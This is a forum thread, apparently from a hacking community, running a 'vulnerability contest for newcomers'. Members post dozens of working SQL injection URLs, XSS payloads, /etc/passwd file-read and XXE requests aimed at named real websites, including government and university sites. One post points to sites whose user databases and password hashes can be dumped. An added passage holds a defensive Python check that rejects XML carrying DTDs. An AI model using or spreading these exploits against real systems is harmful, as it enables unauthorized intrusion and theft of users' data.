Vulnerability contest for newcomers

Discussion in 'Sandbox' started by yarbabin, 1 Jun 2015.

  1. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
    target: http://som.adzu.edu.ph
    type: SQL Injection
    version: 10.0.20-MariaDB-log
    user: som@localhost
    Code:
    http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+from+information_schema.tables+--+

    target: http://www.bulsu.edu.ph
    type: SQL Injection
    version: 5.1.63-community-log
    user: bulsued_friedel@207.198.102.22
    Code:
    http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES

    target: http://www.ntc.gov.ph
    type: SQL Injection
    version: 10.0.15-MariaDB
    user: root@localhost
    Code:
    http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6,7+from+information_schema.tables+--+
    target: http://www.irishsanghatrust.ie
    type: SQL Injection
    version: 5.0.83-community
    user: u1094094_sangha@172.16.5.126
    Code:
    http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_name,9,10,11,12,13,141,15,16,17,18+from+information_schema.tables+--+

    target: http://www.mtzwear.com
    type: SQL Injection
    version: 5.5.10
    user: mtzwear.com@localhost

    Code:
    http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables

     
    #61 joelblack, 23 Jul 2015
    Last edited: 24 Jul 2015
  2. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    298
    Likes Received:
    19
    Reputations:
    12
    Site: http://www.packsend.co.uk
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+
     
  3. joelblack

    target: http://www.romanianwriters.ro
    type: SQL Injection
    version: 5.1.61-0ubuntu0.10.10.1
    user: romanian_rowri@localhost

    Code:
    http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1+--+


    target: http://www.bransonparksandrecreation.com
    type: SQL Injection
    version: 5.0.96-log1
    user: bransonparks@173.201.216.51

    Code:
    http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+
    
    target: http://www.microtekusa.com/
    type: SQL Injection
    version: 5.0.77
    user: root@localhost

    Code:
    http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,table_name,57,58,59,60,61,62,63,64,65,66+from+information_schema.tables+--+

     
  4. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    212
    Likes Received:
    52
    Reputations:
    116
    Found an XSS on Rambler:
    Code:
    http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
    http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
    
    Found on ukr.net
    Code:
    https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
    And also, local file reading
    Code:
    http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
    And I will also be the first to have posted an XML eXternal Entity
    Code:
    http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
    Since little is known about this type of vulnerability, a few comments:
    The vulnerability is based on XML transformation: the inclusion of an external entity. In the XML file we first define an entity which, for example, reads a local file
    Code:
    <!DOCTYPE hello [
    <!ENTITY passwd SYSTEM "file:///etc/passwd">
    ]>
    And then we output &passwd; to the screen

    P.S. Sorry, I checked the top table; it turns out I am not the first
     
    #64 ocheretko, 26 Jul 2015
    Last edited: 26 Jul 2015
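
A defensive check for the external-entity declaration described in the post above, as an added example that is not part of the original thread: it inspects untrusted XML with Python's expat bindings and refuses any document that carries a DTD. The function names, the accept/reject policy and both sample documents are assumptions constructed for illustration.

```python
import xml.parsers.expat as expat

# Constructed sample: the DOCTYPE from the post wrapped around a root element.
XXE_SAMPLE = b"""<!DOCTYPE hello [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<hello>&passwd;</hello>"""

# Constructed sample: an ordinary document with no DTD.
PLAIN_SAMPLE = b"<news><title>Update</title><body>text</body></news>"


def dtd_findings(data: bytes) -> list:
    """Return the DTD features declared in `data` (hypothetical helper).
    The handlers only record declarations; no entity is fetched or expanded.
    """
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name, sysid))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # value is None for external entities; sysid then holds the URI.
        kind = "external-entity" if value is None else "internal-entity"
        findings.append((kind, name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        findings.append(("external-reference", context, sysid))
        return 1  # non-zero: keep parsing, the entity itself is never loaded

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)
    return findings


def accept_for_transform(data: bytes) -> bool:
    """Policy (an assumption): accept only well-formed XML with no DTD."""
    try:
        return dtd_findings(data) == []
    except expat.ExpatError:
        return False


if __name__ == "__main__":
    for label, doc in (("xxe", XXE_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, accept_for_transform(doc), dtd_findings(doc))
```

Running the check before the document reaches the XSLT processor means the transform never sees a DOCTYPE, and the recorded findings can be logged as a detection signal.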
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    Table updated, everyone added. Please check for duplicates: it counts as a duplicate if the vulnerability has been posted anywhere.
    You are the first. I wrote up an XXE for myself as an example, and credited it to you. Good work :)
     
  6. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    45
    Likes Received:
    14
    Reputations:
    9
    Site: http://ww2.odu.edu
    Vulnerability: LFR
    Exploit:
    Code:
    http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php
    The PHP code is visible in the page source. :D Only that doesn't give much, at least not to me.
     
  7. joelblack

    target: http://www.cymbeline.com
    type: SQL Injection
    version: 5.1.73
    user: cymbeline@localhost
    Code:
    http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
    target: http://igamer.su
    type: SQL Injection
    version: 5.1.73
    user: db_user_igamer@localhost

    Code:
    http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
    target: http://www.kirpichi.kz
    type: SQL Injection
    version: 5.5.44-cll-lve
    user: V_8337_KIRPICH@LOCALHOST
    Code:
    http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
    target: http://www.qbele.com.br
    type: SQL Injection
    version: 5.1.73-rel14.11-log
    user: site1371378569@186.202.153.159
    Code:
    http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas

     
    #67 joelblack, 4 Aug 2015
    Last edited: 4 Aug 2015
  8. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Site: http://www.gorodokboxing.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
    Site: http://www.malnaditimudigere.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
    Site: http://glamdring.baac.or.th
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
    Site: http://web-sayansk.net
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
    Site: http://www.replacement-windows.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
    Site: http://www.bellebuddy.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
    Site: http://www.babilon-nyelvstudio.hu
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
     
    #68 blud_niy, 7 Aug 2015
    Last edited: 7 Aug 2015
  9. blud_niy

    Tell me... has the contest already ended?
     
  10. yarbabin

    No, I add entries when I can
     
  11. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
    Site: cc-comics.pl
    Vulnerability: Local File Inclusion
    Exploit:
    Code:
    http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
    Site: www.ctpart.com
    Vulnerability: Local File Inclusion
    Code:
    http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
     
  12. comstream

  13. yarbabin

    Added
     
  14. comstream

    Site: http://mod.gov.kz
    Vulnerability: XSS
    Exploit:
    Code:
    mod.gov.kz/kaz/akciya_k_70yu_letiyu/foto_akciya'"()%26%25<acx><ScRiPt >alert(document.cookie)</ScRiPt>/
     
  15. Metal-Core

    Metal-Core Member

    Joined:
    20 Sep 2011
    Messages:
    156
    Likes Received:
    14
    Reputations:
    0
  16. Strannik1236

    Strannik1236 Member

    Joined:
    6 Sep 2015
    Messages:
    11
    Likes Received:
    13
    Reputations:
    0
    How many vulnerabilities do you need to find, and what does the winner get?
     
  17. yarbabin

    Reread the first post
     
  18. blud_niy

    Site: thewhole9.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.thewhole9.com/event_read.php?id=-2594'+union+select+1,2,version(),4,5,6,7,8,9,user(),table_name,12,13,14,15,16,17+from+information_schema.tables+limit+3,1+--+
    Site: domainefoivos.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.domainefoivos.com/news-read.php?id=-10'+union+select+1,version(),3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
    Site: zupa.pregrada.hr
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.zupa.pregrada.hr/story.php?id=-276'+union+select+1,version(),3,4,user(),6+--+
    Site: obfzgalanta.sk
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://obfzgalanta.sk/uniweb/article.php?id=-2719'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
    Site: obfztopolcany.sk
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.obfztopolcany.sk/uniweb/article.php?id=-3178'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
    Site: letzzep.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.letzzep.com/reviewpop.php?id=-30'+union+select+1,table_name,3,4,5,user(),version(),8+from+information_schema.tables+limit+3,1+--+
    Site: agrovolyn.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
    Site: siempreenplay.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
    Site: kmbajwa.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://kmbajwa.com/page.php?id=-9'+union+select+1,version(),table_name+from+information_schema.tables+limit+4,1+--+
    Site: bhajanawali.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.bhajanawali.com/reading-den/read.php?id=-10'+union+select+1,table_name,3,4+from+information_schema.tables+limit+4,1+--+
     
  19. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Hi everyone!
    I'm not yet very good at working these through by hand, so don't blame me))

    http://www.24open-casino.com//index.php?act=games&hall=playtech&p= - an online casino; the site has a whole pile of SQLi and XSS flaws, the database can be pulled out trivially, passwords in MD5, a pile of personal info on users.

    http://www.fortunataptr.pl/scripts/runner.php?GA= - e-mail addresses with accounts, passwords in MD5 (SQLi);

    http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid= - passwords without encryption (SQLi);

    http://www.yickyak.net/categories.php?catid= - passwords in MD5 (SQLi);

    http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id= - passwords without encryption (SQLi).
     
    #79 ubepkr, 21 Sep 2015
    Last edited: 28 Sep 2015
  20. Diadlo

    Diadlo New Member

    Joined:
    24 Sep 2015
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    Site: www.metal-rules.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.metal-rules.com/polls/index.php?id=-1%27+UNION+SELECT+1,user(),3,version()+--+
    While I'm at it, I'd like a hint. Am I being dense, or is there no users table there?
     
    #80 Diadlo, 30 Sep 2015
    Last edited: 30 Sep 2015